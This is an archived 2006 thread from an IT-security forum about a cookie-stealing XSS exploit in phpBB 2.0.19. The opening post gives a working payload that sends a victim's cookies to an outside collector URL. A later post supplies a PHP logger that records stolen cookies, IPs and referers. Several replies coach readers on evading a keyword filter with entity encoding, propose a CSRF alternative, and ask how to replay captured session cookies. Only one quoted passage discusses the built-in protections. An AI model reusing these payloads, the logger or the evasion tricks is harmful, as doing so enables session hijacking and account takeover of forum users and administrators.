Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
December 8, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 216
Members: 0
Total: 216
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
PostPosted: Tue Jan 31, 2006 11:40 pm Reply with quote
syntax9
Active user
Active user
 
Joined: Dec 21, 2005
Posts: 33




# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

http://www.somesite.com/</pre>

# milw0rm.com [2006-01-29]
View user's profile Send private message
PostPosted: Wed Feb 01, 2006 7:20 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




like in 2018..

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0063
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 11, 2006 6:08 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




credit to everyone that found this bug


poc
http://kisobox.com/exploits/phpbb.2.0.19.xss+cookies.stealer.txt

brief video tutorial about it.

http://kisobox.com/vtu.php or http://kisobox.com/area52/phpbb2.0.19
more to come.
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 08, 2006 10:09 am Reply with quote
Musaaf
Beginner
Beginner
 
Joined: Mar 08, 2006
Posts: 3




subzero wrote:
credit to everyone that found this bug


poc
http://kisobox.com/exploits/phpbb.2.0.19.xss+cookies.stealer.txt

brief video tutorial about it.

http://kisobox.com/vtu.php or http://kisobox.com/area52/phpbb2.0.19
more to come.


Just reading this, the exploit for 2.0.19

http://www.kisobox.com/exploits/Remote/phpbb.2.0.19.xss+cookies.stealer.txt

Quote:
POC : xss in bbcode (html enable)

<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >




cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


How to use it ? and what to do with the cookie.php file
View user's profile Send private message
hola
PostPosted: Tue Mar 14, 2006 7:13 pm Reply with quote
DARKNIGHT
Beginner
Beginner
 
Joined: Mar 14, 2006
Posts: 1




Well, Thank you for the code, it's nice, but I have a problem.

First, I proved that code in my localhost, my localhost has Nuke ET 3.3 (the nuke et is a version of php-nuke modified => www.truzone.org). HTML is on.

I wrote the code in a post:
<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >Cualquier texto o codigo</pre>

But maybe the nuke changed the code for this:
onmouseover='doc***nt.location="http://localhost/cookies.php?c="+doc***nt.cookie' b='<pre' >Cualquier texto o codigo</pre>

So, in concret the possible protection is that when you write the word document the nuke et change it for doc***nt.

My question is this: can I use concatenation o something in order to change the word document?.

For example that one variable represent one letter and soon to unite them.
var1="doc " + "u" + "m" + "e" + "nt";

Maybe I'm crazy for saying a theory (aja) very ridiculous.

And finally another question do you have another solution or existing another code in orde to explode this bug?

Well, thank you for your answers and I'm sorry for my english, I don't have practice with my english.
View user's profile Send private message
PostPosted: Tue Mar 14, 2006 9:27 pm Reply with quote
syntax9
Active user
Active user
 
Joined: Dec 21, 2005
Posts: 33




the code is for phpbb, never tried it with phpnuke.
View user's profile Send private message
Re: hola
PostPosted: Tue Mar 14, 2006 10:22 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




DARKNIGHT wrote:

My question is this: can I use concatenation o something in order to change the word document?.


Try HTML without semicolons... I am not sure.. but i have tested in IE and works..

document=&#100&#111&#99&#117&#109&#101&#110&#116

etc..
View user's profile Send private message Visit poster's website
Re: hola
PostPosted: Tue Mar 14, 2006 10:24 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




DARKNIGHT wrote:

My question is this: can I use concatenation o something in order to change the word document?.


Try HTML without semicolons... I am not sure.. but i have tested in IE and works..

document=&#100&#111&#99&#117&#109&#101&#110&#116

etc..
View user's profile Send private message Visit poster's website
Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
PostPosted: Wed Mar 15, 2006 6:14 pm Reply with quote
greatshape
Beginner
Beginner
 
Joined: Mar 10, 2006
Posts: 4




syntax9 wrote:
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

http://www.somesite.com/</pre>

# milw0rm.com [2006-01-29]


Just found something worth mentioning.
This isn't working on phpbb 2.0.19 if you send the admin a PM to steal his cookie.
Html is always disabled in his inbox, even when it's enabled on the board.
He will always see the rough html code you typed in his PM

Regards
GreATshaPe
View user's profile Send private message
PostPosted: Wed Mar 15, 2006 8:14 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi
View user's profile Send private message Visit poster's website
PostPosted: Thu Mar 16, 2006 2:40 am Reply with quote
greatshape
Beginner
Beginner
 
Joined: Mar 10, 2006
Posts: 4




cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi


Looks nice! I don't get it for 100%, but i'll find out.
For example, in the movie, where does the root login come from all of a sudden?
How does the attacker know this login?
Tnx

PS Is there a way to defend against this as admin?
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 1:49 pm Reply with quote
sami
Beginner
Beginner
 
Joined: Mar 16, 2006
Posts: 1




In regards to the following exploit....

cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi



i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 1:49 pm Reply with quote
sami
Beginner
Beginner
 
Joined: Mar 16, 2006
Posts: 1




In regards to the following exploit....

cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi



i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 2:59 pm Reply with quote
cXIb8O3
Active user
Active user
 
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




sami wrote:

i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....


in exploit you have

Code:

$url = parse_url(getenv('HTTP_REFERER'));

preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid);


if in HTTP_REFFERER is sid... exploit works... admin need see hacker profil with IMG URL to exploit..
View user's profile Send private message Visit poster's website
PostPosted: Sat Mar 18, 2006 6:16 am Reply with quote
Cat
Beginner
Beginner
 
Joined: Mar 15, 2006
Posts: 4




Hmmm..
Well this obviously works, results:
phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=5a37b34c08b31a776b01faaff43e6d38

However I have come to a dire problem. When it comes to crafting the cookie, it doesn't work right. I used FF to craft --

name: phpbb2mysql_data
data: a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}

etc...

Doesn't work though...I have tried converting the _data (example) one to hex as well.

Any suggestions?
View user's profile Send private message
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.091 Seconds